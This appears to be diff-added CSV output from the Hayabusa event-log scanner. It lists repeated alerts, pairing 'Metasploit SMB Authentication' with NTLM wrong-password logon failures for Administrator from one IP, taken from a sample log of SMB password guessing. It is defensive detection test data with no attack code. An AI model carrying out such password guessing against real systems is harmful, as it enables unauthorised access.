+2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AUeUmYa72BzHfyhK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ksydur7W1mUoOZAE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YNIzopnsXH6OjcUs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SQljJkaWs8bcaOI1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1jejn6ZMo564m7ok  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KrpBO1SCHpt27CRM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ifPePsozBYRLCU3k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vve4r8QwaMLKrrcX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i9ArElR5k8yLefWu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4a1Y126C516BaGcz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VL7PnrO2dLsEbebQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GGTlLZ8J9f2PtiuL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6sVwPFs7bhJgJwRt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dgQNHL9etdHdRw9Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mjZrWpJlN2CwbxFc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 72lmrp6neWGKAURB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CnTi5dgoWunYutJ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vi2fTl07llsJEYyt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hohh8KS1eYtojEya  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RsuC8F95UmsOSKvs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: be8UJ0EN7XS5r0b6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CgJlVYanwWKAhJ7O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zthqCIkr1nKtqcCj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tzmi8I402j71q5Wg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m0U3NYl8QEbgeJry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uJJ1FOUIBInGkKPQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bu0X5RisszAHEs0X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ZZfs8zqT2bLOAHq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qkpO31LzJfaYLyjB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BJrIsRTWUwPuySR7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VHNccqtwl9Y9IhLq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: APlvDcMzvms0gehT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AxOERGKI75RarVNZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uvzwd5qqC7og49yW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lksm3o2g0YhFnm4Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zwXhSPCV4qHVF9Rc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z31baZ4G36idFMeX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WK63qylKunHZB3zS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ALJxKGwyZz7JDpRg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q8tioTO3TEIzdzY0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5dIKTgQkvPKzKJoZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ta0IMrlArbgONhDG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MKNUu4624Rvr87kK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n7jIL2FkXzWqvWTJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oJMVh1zdQt7EikVj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
